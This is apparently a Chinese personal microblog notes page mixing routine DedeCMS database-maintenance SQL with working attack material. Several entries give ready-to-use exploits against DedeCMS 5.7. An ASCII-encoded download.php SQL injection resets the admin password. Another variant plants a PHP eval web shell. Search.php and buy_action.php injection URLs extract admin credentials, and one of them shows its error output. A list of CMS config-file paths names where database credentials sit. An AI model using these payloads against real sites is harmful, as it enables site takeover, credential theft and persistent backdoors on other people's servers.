微博搜索

关键词:微博 评论 昵称

转载 linux 学习之路(学linux必看) 链接
ssh mysql命令大全 链接
Wdcp linux服务器系统安装及设置图文解说 链接
9个 SSH常用命令选项 链接

2017/2/24 17:05:41 通过网页

DEDE5.7 清空所有文章且以后新建文章ID从1开始
delete from dede_addonarticle;
delete from dede_addonimages;
delete from dede_archives;
delete from dede_arctiny;
delete from dede_co_htmls;
delete from dede_co_urls;
delete from dede_co_mediaurls;
delete from dede_tagindex ;
delete from dede_taglist;
delete from dede_keywords;
在后台直接运行上面的语句,意思是清空文章和原来采集过的记录
TRUNCATE TABLE `dede_archives`;
再在后台直接运行上面的语句
TRUNCATE TABLE `dede_archives`;
使用SQL的清空表的命令。ID就会从1开始。
dede文章删除后 id从1开始设置方法
只需要执行三条SQL语句就可以了:
1、 ALTER TABLE `dede_archives` AUTO_INCREMENT =1; 主表
2、ALTER TABLE `dede_arctiny` AUTO_INCREMENT =1; 微表
3、ALTER TABLE `dede_addonarticle` AUTO_INCREMENT =1; 附加表
很多人 都是只将主表dede_archives id设置为了1,这样还不行。一定要同时将微表dede_arctiny和附加表dede_addonarticle一并执行了这样id才可从1开始。

ALTER TABLE `dede_archives` AUTO_INCREMENT =1;
ALTER TABLE `dede_arctiny` AUTO_INCREMENT =1;
ALTER TABLE `dede_addonarticle` AUTO_INCREMENT =1;

2016/7/2 15:17:19 通过网页

plus/download.php
构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc):
admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #
完整SQL语句:
UPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash'
EXP:
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
如果不出问题,后台登录用户spider密码admin
漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。
如果找不到后台,参见以前修改数据库直接拿SHELL的方法:
UPDATE `dede_mytag` SET `normbody` = '{dede:php}file_put_contents(''spider.php'','''');{/dede:php}' WHERE `aid` =1 LIMIT 1 ;
EXP:
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
会在plus目录生成 x.php 密码 m
http://127.0.0.1/plus/x.php
update成功后还要访问下 /plus/mytag_js.php/aid=1
失败原因:
测试发现,如果aid为空或已经生成过一次,则会写shell失败….更改倒数第三个ascii改变改变aid(即&arrs2[]=49)
配图:
1.查看dede当前版本,补丁情况:
http://www.nxadmin.com/data/admin/ver.txt

2016/6/15 18:27:30 通过网页

工具软件:通杀dedecms plus/search.php漏洞利用

/member/buy_action.php?product=1',1,2,3,4,5,@`'`),((select user()),(select 1),'4
member/operation.php

/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35

PHPCMS V9 \phpcms\base.php
PHPWIND8.7 \data\sql_config.php
DEDECMS5.7 \data\common.inc.php
DiscuzX2 \config\config_global.php
Wordpress \wp-config.php
Metinfo \include\head.php

/manager/ewebeditor/admin/default.php

2016/6/15 17:49:46 通过网页

dedecms织梦搜索页利用
/* 代码0
/plus/search.php?keyword=as&typeArr[ uNion ]=a


/* 代码1
/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a"
Dim exp2 As String = "/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,6

/* 代码2
/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
Error infos: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') UnIon seleCt 1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,2' at line 1
Error sql: SELECT channeltype FROM `www_arctype` WHERE id=11=@`\'`) UnIon seleCt 1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 from `www_admin`#@`\'` LIMIT 0,1;

2016/6/15 17:40:43 通过网页

WIN2003全能网站环境+安全设置+网站开通和管理软件GHOST系统
在win2003 SP2企业版的基础上集成了ASP+PHP5.217+NET1.1/2.0/3.5/4.0+SQL2005+MYSQL5+ZEND+FTP+伪静态组件+网站开通和管理助手+网站木马过滤插件+服务器安全设置(系统级别的安全设置和数据中心企业级安全设置),功能强大。只用将系统还原到服务器中就自动配置出了全能的网站环境和做了安全设置!
本系统一起有3个GHOST文件,建议服务器硬盘最少分区为4个分区,
C盘是系统盘一般60G左右;
D盘为网站存放分区请分100G以上;
E盘为SQL2005和MYSQL数据库存放分区请分100G左右即可;
F盘视情况而定一般给到30G就可以了,不用分太大,主要是放备份文件等。
请将WIN2003C5.GHO还原的C盘,WIN2003D5.GHO还原到D盘,WIN2003E5.GHO还原到E盘,还原后win2003系统超级管理员用户为admin,密码为www.piis.cn,远程桌面是开启的,远程桌面的端口是20300,不是3389。
C盘GHOST文件: http://pan.baidu.com/s/1bn3w3BT 提取密码5qxw
D盘GHOST文件: http://pan.baidu.com/s/1qWJldE0 提取密码7u0j
E盘GHOST文件: http://pan.baidu.com/s/1mgKFgQs 提取密码8etd

需要WIN2003 SP2企业版 纯净版GHOST系统的请下载:
http://pan.baidu.com/s/13y5sy 提取密码vzxq

原文链接:http://user.qzone.qq.com/1477445102/blog/1410633826

2016/2/17 11:23:49 通过网页

dedecms一句sql修改默认管理员用户名admin
update dede_admin set userid='你要的登录名' where id=1

2016/1/13 22:56:56 通过网页

织梦批量删除垃圾注册会员SQL语句
delete from dede_member where mid between 10 and 21666

2015/11/5 18:05:52 通过网页

一键清理dedecms回收站
delete dede_addonarticle,dede_archives,dede_arctiny from dede_addonarticle,dede_archives,dede_arctiny where dede_addonarticle.aid=dede_archives.id and dede_arctiny.id=dede_archives.id and dede_archives.arcrank='-2'
刚刚发现待审核文档里出现了七千多条垃圾文档 通过ID批量删除后 还留在回收站里 然后执行了上述sql代码 问题解决。

2015/11/1 15:59:16 通过网页

发现一个不错的免费空间 1x.de 10GB Webspace, PHP und MySQL

2014/11/20 22:26:49 通过网页

共计:10 条记录 每页:20条1